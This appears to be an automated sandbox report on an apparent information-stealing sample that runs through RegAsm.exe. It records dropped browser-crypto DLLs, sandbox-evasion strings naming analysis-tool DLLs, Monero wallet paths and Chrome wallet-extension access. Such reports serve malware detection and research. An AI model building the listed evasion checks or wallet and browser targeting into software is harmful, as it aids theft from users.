                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sxs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mozglue.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wsock32.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msvcp140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windowscodecs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwrite.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.ui.immersive.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: bcp47mrm.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uianimation.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dxgi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: d3d11.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: d3d10warp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dxcore.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dcomp.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dwmapi.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: file.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                        Source: Binary string: mozglue.pdbP source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: freebl3.pdb source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: freebl3.pdbp source: RegAsm.exe, 00000002.00000002.3304395342.0000000023050000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr
                        Source: Binary string: nss3.pdb@ source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: c:\rje\tg\obj\Release\ojc.pdb source: file.exe
                        Source: Binary string: softokn3.pdb@ source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: RegAsm.exe, 00000002.00000002.3315681328.000000003AE07000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.2.dr
                        Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: RegAsm.exe, 00000002.00000002.3310118998.000000002EF2B000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.2.dr
                        Source: Binary string: nss3.pdb source: RegAsm.exe, 00000002.00000002.3326846154.000000006C2CF000.00000002.00000001.01000000.00000008.sdmp, RegAsm.exe, 00000002.00000002.3318468661.0000000040D70000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.2.dr
                        Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: RegAsm.exe, 00000002.00000002.3299208500.000000001C9E7000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3303889118.0000000022958000.00000002.00001000.00020000.00000000.sdmp
                        Source: Binary string: mozglue.pdb source: RegAsm.exe, 00000002.00000002.3307228055.0000000028FBA000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.3325754871.000000006C10D000.00000002.00000001.01000000.00000009.sdmp, mozglue.dll.2.dr
                        Source: Binary string: softokn3.pdb source: RegAsm.exe, 00000002.00000002.3312936893.0000000034E93000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.2.dr
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                        Source: softokn3.dll.2.drStatic PE information: section name: .00cfg
                        Source: nss3.dll.2.drStatic PE information: section name: .00cfg
                        Source: freebl3.dll.2.drStatic PE information: section name: .00cfg
                        Source: mozglue.dll.2.drStatic PE information: section name: .00cfg
                        Source: msvcp140.dll.2.drStatic PE information: section name: .didat
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0042F142 push ecx; ret 2_2_0042F155
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00422D3B push esi; ret 2_2_00422D3D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041DDB5 push ecx; ret 2_2_0041DDC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00432715 push 0000004Ch; iretd 2_2_00432726
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_6C0CB536 push ecx; ret 2_2_6C0CB549
                        Source: file.exeStatic PE information: section name: .text entropy: 7.99542204298472
                        Source: DAEBKKKEHD.exe.2.drStatic PE information: section name: .text entropy: 7.999295139872825
                        Source: ljhgfsd[1].exe.2.drStatic PE information: section name: .text entropy: 7.999295139872825
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DAEBKKKEHD.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\mozglue.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\DAEBKKKEHD.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\msvcp140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\vcruntime140.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile created: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00418950 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,2_2_00418950
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                        Malware Analysis System Evasion

                        barindex
                        Yara detected AntiVM3
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.file.exe.3fe5570.2.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000000.00000002.2060446715.0000000003FE5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: file.exe PID: 6128, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 6508, type: MEMORYSTR
                        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                        Source: RegAsm.exeBinary or memory string: DIR_WATCH.DLL
                        Source: RegAsm.exe, 00000002.00000002.3293044181.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: INMPM20IXQUGN9:-?5(\C!7%{->^WALLET_PATHSOFTWARE\MONERO-PROJECT\MONERO-CORE.KEYS\MONERO\WALLET.KEYS\\\*.*\\...\\\\\\\\\\\\HAL9THJOHNDOEDISPLAYAVGHOOKX.DLLAVGHOOKA.DLLSNXHK.DLLSBIEDLL.DLLAPI_LOG.DLLDIR_WATCH.DLLPSTOREC.DLLVMCHECK.DLLWPESPY.DLLCMDVRT32.DLLCMDVRT64.DLL20:41:3120:41:3120:41:3120:41:3120:41:3120:41:31DELAYS.TMP%S%SNTDLL.DLL
                        Source: RegAsm.exeBinary or memory string: SBIEDLL.DLL
                        Source: RegAsm.exeBinary or memory string: API_LOG.DLL
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 1240000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 2FE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\file.exeMemory allocated: 2DE0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: OpenInputDesktop,SetThreadDesktop,GetCursorPos,GetCursorPos,Sleep,Sleep,GetCursorPos,Sleep,Sleep,GetCursorPos,2_2_0040180D
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 1249Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeWindow / User API: threadDelayed 2043Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\DAEBKKKEHD.exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\ljhgfsd[1].exeJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\freebl3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeDropped PE file which has not been started: C:\ProgramData\softokn3.dllJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeAPI coverage: 8.1 %
                        Source: C:\Users\user\Desktop\file.exe TID: 6728Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410DDB GetKeyboardLayoutList followed by cmp: cmp eax, ebx and CTI: jbe 00410EEEh2_2_00410DDB
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0041543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_0041543D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00414CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,strtok_s,strtok_s,FindNextFileA,FindClose,2_2_00414CC8
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00409D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_00409D1C
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,2_2_0040D5C6
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B5DF
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00401D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,FindNextFileA,FindClose,FindNextFileA,FindClose,2_2_00401D80
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,2_2_0040BF4D
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,2_2_00415FD1
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040B93F FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,2_2_0040B93F
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,2_2_00415B0B
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,FindNextFileA,FindClose,2_2_0040CD37
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00415142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,2_2_00415142
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00410FBA GetSystemInfo,wsprintfA,2_2_00410FBA
                        Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
